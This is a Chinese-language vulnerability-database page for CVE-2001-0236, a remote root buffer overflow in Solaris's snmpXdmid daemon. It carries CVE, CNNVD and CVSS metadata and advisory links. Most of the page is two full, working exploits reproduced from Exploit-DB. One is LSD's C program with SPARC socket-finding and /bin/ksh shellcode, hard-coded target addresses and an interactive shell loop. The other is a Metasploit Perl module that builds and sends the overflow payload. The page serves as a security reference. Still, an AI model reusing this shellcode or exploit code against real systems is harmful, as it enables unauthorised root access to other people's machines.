CVE-2001-0236
CVSS10.0
发布时间 :2001-05-03 00:00:00
修订时间 :2016-10-17 22:10:15
NMCOE    

[原文]Buffer overflow in Solaris snmpXdmid SNMP to DMI mapper daemon allows remote attackers to execute arbitrary commands via a long "indication" event.


[CNNVD]DMI映射器守护程序缓冲区溢出漏洞(CNNVD-200105-027)

        DMI映射器守护程序的Solaris snmpXdmid SNMP存在缓冲区溢出漏洞。远程攻击者可以借助超长"indication"事件执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0236
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-027
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=98462536724454&w=2
(UNKNOWN)  BUGTRAQ  20010314 Solaris /usr/lib/dmi/snmpXdmid vulnerability
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/207
(UNKNOWN)  SUN  00207
http://www.cert.org/advisories/CA-2001-05.html
(VENDOR_ADVISORY)  CERT  CA-2001-05
http://www.ciac.org/ciac/bulletins/l-065.shtml
(UNKNOWN)  CIAC  L-065
http://www.securityfocus.com/bid/2417
(VENDOR_ADVISORY)  BID  2417
http://xforce.iss.net/static/6245.php
(UNKNOWN)  XF  solaris-snmpxdmid-bo(6245)

- 漏洞信息

DMI映射器守护程序缓冲区溢出漏洞
危急 缓冲区溢出
2001-05-03 00:00:00 2005-10-12 00:00:00
远程  
        DMI映射器守护程序的Solaris snmpXdmid SNMP存在缓冲区溢出漏洞。远程攻击者可以借助超长"indication"事件执行任意命令。
        

- 公告与补丁

        

- 漏洞信息 (20648)

Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability (EDBID:20648)
solaris remote
2001-03-15 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/2417/info

Versions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa.

SnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap.

SnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately. 

/*## copyright LAST STAGE OF DELIRIUM mar 2001 poland        *://lsd-pl.net/ #*/
/*## snmpXdmid                                                               #*/

/* as the final jump to the assembly code is made to the heap area, this code */ 
/* also works against machines with non-exec stack protection turned on       */ 
/* due to large data transfers of about 128KB, the code may need some time to */
/* proceed, so be patient                                                     */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define SNMPXDMID_PROG 100249
#define SNMPXDMID_VERS 0x1
#define SNMPXDMID_ADDCOMPONENT 0x101

char findsckcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>          */
    "\x7f\xff\xff\xff"     /* call    <findsckcode+4>        */
    "\x33\x02\x12\x34"
    "\xa0\x10\x20\xff"     /* mov     0xff,%l0               */
    "\xa2\x10\x20\x54"     /* mov     0x54,%l1               */
    "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2            */
    "\xaa\x03\xe0\x28"     /* add     %o7,40,%l5             */
    "\x81\xc5\x60\x08"     /* jmp     %l5+8                  */
    "\xc0\x2b\xe0\x04"     /* stb     %g0,[%o7+4]            */
    "\xe6\x03\xff\xd0"     /* ld      [%o7-48],%l3           */
    "\xe8\x03\xe0\x04"     /* ld      [%o7+4],%l4            */
    "\xa8\xa4\xc0\x14"     /* subcc   %l3,%l4,%l4            */
    "\x02\xbf\xff\xfb"     /* bz      <findsckcode+32>       */
    "\xaa\x03\xe0\x5c"     /* add     %o7,92,%l5             */
    "\xe2\x23\xff\xc4"     /* st      %l1,[%o7-60]           */
    "\xe2\x23\xff\xc8"     /* st      %l1,[%o7-56]           */
    "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]           */
    "\x90\x04\x20\x01"     /* add     %l0,1,%o0              */
    "\xa7\x2c\x60\x08"     /* sll     %l1,8,%l3              */
    "\x92\x14\xe0\x91"     /* or      %l3,0x91,%o1           */
    "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2            */
    "\x82\x10\x20\x36"     /* mov     0x36,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x1a\xbf\xff\xf1"     /* bcc     <findsckcode+36>       */
    "\xa0\xa4\x20\x01"     /* deccc   %l0                    */
    "\x12\xbf\xff\xf5"     /* bne     <findsckcode+60>       */
    "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
    "\x90\x04\x20\x02"     /* add     %l0,2,%o0              */
    "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
    "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
    "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
    "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
    "\x12\xbf\xff\xfb"     /* bne     <findsckcode+112>      */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>          */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>            */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>          */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh"
;

static char nop[]="\x80\x1c\x40\x11";

typedef struct{
    struct{unsigned int len;char *val;}name;
    struct{unsigned int len;char *val;}pragma;
}req_t;

bool_t xdr_req(XDR *xdrs,req_t *objp){
    char *v=NULL;unsigned long l=0;int b=1;
    if(!xdr_u_long(xdrs,&l)) return(FALSE);
    if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
    if(!xdr_bool(xdrs,&b)) return(FALSE);
    if(!xdr_u_long(xdrs,&l)) return(FALSE);
    if(!xdr_bool(xdrs,&b)) return(FALSE);
    if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char),
        (xdrproc_t)xdr_char)) return(FALSE);
    if(!xdr_bool(xdrs,&b)) return(FALSE);
    if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char),
        (xdrproc_t)xdr_char)) return(FALSE);
    if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
    if(!xdr_u_long(xdrs,&l)) return(FALSE);
    return(TRUE);
}

main(int argc,char **argv){
    char buffer[140000],address[4],pch[4],*b;
    int i,c,n,vers=-1,port=0,sck;
    CLIENT *cl;enum clnt_stat stat;
    struct hostent *hp;
    struct sockaddr_in adr;
    struct timeval tm={10,0};
    req_t req;

    printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/\n");
    printf("snmpXdmid for solaris 2.7 2.8 sparc\n\n");

    if(argc<2){
        printf("usage: %s address [-p port] -v 7|8\n",argv[0]);
        exit(-1);
    }

    while((c=getopt(argc-1,&argv[1],"p:v:"))!=-1){
        switch(c){
        case 'p': port=atoi(optarg);break;
        case 'v': vers=atoi(optarg);
        }
    }
    switch(vers){
    case 7: *(unsigned int*)address=0x000b1868;break;
    case 8: *(unsigned int*)address=0x000cf2c0;break;
    default: exit(-1);
    }

    *(unsigned long*)pch=htonl(*(unsigned int*)address+32000);
    *(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);

    printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
    fflush(stdout);

    adr.sin_family=AF_INET;
    adr.sin_port=htons(port);
    if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            errno=EADDRNOTAVAIL;perror("error");exit(-1);
        }
        memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
    }

    sck=RPC_ANYSOCK;
    if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){
        clnt_pcreateerror("error");exit(-1);
    }
    cl->cl_auth=authunix_create("localhost",0,0,0,NULL);

    i=sizeof(struct sockaddr_in);
    if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
        struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
        ioctl(sck,(('S'<<8)|2),"sockmod");
        nb.maxlen=0xffff;
        nb.len=sizeof(struct sockaddr_in);;
        nb.buf=(char*)&adr;
        ioctl(sck,(('T'<<8)|144),&nb);
    }
    n=ntohs(adr.sin_port);
    printf("port=%d connected! ",n);fflush(stdout);

    findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);
    findsckcode[12+3]=(unsigned char)(n&0xff);

    b=&buffer[0];
    for(i=0;i<1248;i++) *b++=pch[i%4];
    for(i=0;i<352;i++) *b++=address[i%4];
    *b=0;

    b=&buffer[10000];
    for(i=0;i<64000;i++) *b++=0;
    for(i=0;i<64000-188;i++) *b++=nop[i%4];
    for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    req.name.len=1200+400+4;
    req.name.val=&buffer[0];
    req.pragma.len=128000+4;
    req.pragma.val=&buffer[10000];

    stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);
    if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
    printf("sent!\n");

    write(sck,"/bin/uname -a\n",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}

		

- 漏洞信息 (20649)

Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability (msf) (EDBID:20649)
solaris remote
2001-03-15 Verified
0 vlad902
N/A [点击下载]
source: http://www.securityfocus.com/bid/2417/info
 
Versions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa.
 
SnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap.
 
SnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::solaris_snmpxdmid;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use Pex::SunRPC;
use Pex::XDR;

my $advanced = { };
my $info =
{
	'Name'  => 'Solaris snmpXdmid AddComponent Overflow',
	'Version'  => '$Revision: 1.6 $',
	'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
	'Arch'  => [ 'sparc' ],
	'OS'    => [ 'solaris' ],
	'Priv'  => 1,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target RPC port', 111],
	},
	'Payload' => {
		'Space' => 64000,
		'MinNops' => 63000,
	},
	'Description'  => Pex::Text::Freeform(qq{
	Exploit based on LSD's solsparc_snmpxdmid.c. Exploit a simple overflow and
	return to the heap avoiding NX stacks.
	}),
	'Refs'  =>  [
		['BID', 2417],
		['URL', 'http://lsd-pl.net/code/SOLARIS/solsparc_snmpxdmid.c'],
	],
	'Targets' => [
		[ 'Solaris 7 / SPARC', 0xb1868 + 96000, 0xb1868 + 32000 ],
		[ 'Solaris 8 / SPARC', 0xcf2c0 + 96000, 0xcf2c0 + 32000 ],
	],
	'Keys'  => ['snmpxdmid'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;

	my $target_idx = $self->GetVar('TARGET');
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;

	my $target = $self->Targets->[$target_idx];

	my %data;

	my $host = $self->GetVar('RHOST');
	my $port = $self->GetVar('RPORT');

	if(Pex::SunRPC::Clnt_create(\%data, $host, $port, 100249, 1, "tcp", "tcp") == -1)
	{
		$self->PrintLine("[*] RPC request failed (snmpXdmid).");
		return;
	}

	$self->PrintLine("[*] Using port $data{'rport'}");
	Pex::SunRPC::Authunix_create(\%data, "localhost", 0, 0, []);
	$self->PrintLine("[*] Generating buffer...");

	my $array1 =
		(pack("N", ($target->[2])) x (1248/4)).
		(pack("N", ($target->[1])) x (352/4)).
		(pack("N", 0));

	my $array2 =
		(pack("N", 0) x (64000/4)).
		($shellcode).
		(pack("N", 0));

	my @array1_tbl = map { unpack("C", $_) } split(//, $array1);
	my @array2_tbl = map { unpack("C", $_) } split(//, $array2);

	my $buf =
		Pex::XDR::Encode_int(0).
		Pex::XDR::Encode_int(0).
		Pex::XDR::Encode_bool(1).
		Pex::XDR::Encode_int(0).
		Pex::XDR::Encode_bool(1).
		Pex::XDR::Encode_varray([@array1_tbl], \&Pex::XDR::Encode_lchar).
		Pex::XDR::Encode_bool(1).
		Pex::XDR::Encode_varray([@array2_tbl], \&Pex::XDR::Encode_lchar).
		Pex::XDR::Encode_int(0).
		Pex::XDR::Encode_int(0);

	$self->PrintLine("[*] Sending payload...");

	if(Pex::SunRPC::Clnt_call(\%data, 0x101, $buf) == -1)
	{
		$self->PrintLine("[*] snmpXdmid addcomponent request failed.");
		return;
	}

	$self->PrintLine("[*] Sent!");

	return;
}

		

- 漏洞信息

546
Solaris snmpXdmid Long Indication Event Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

A remote overflow exists in the snmpXdmid RPC service on Solaris. The snmpXdmid service fails to check the length of an incoming buffer resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code and obtain root access.

- 时间线

2001-03-14 Unknow
2001-03-15 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun Microsystems has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站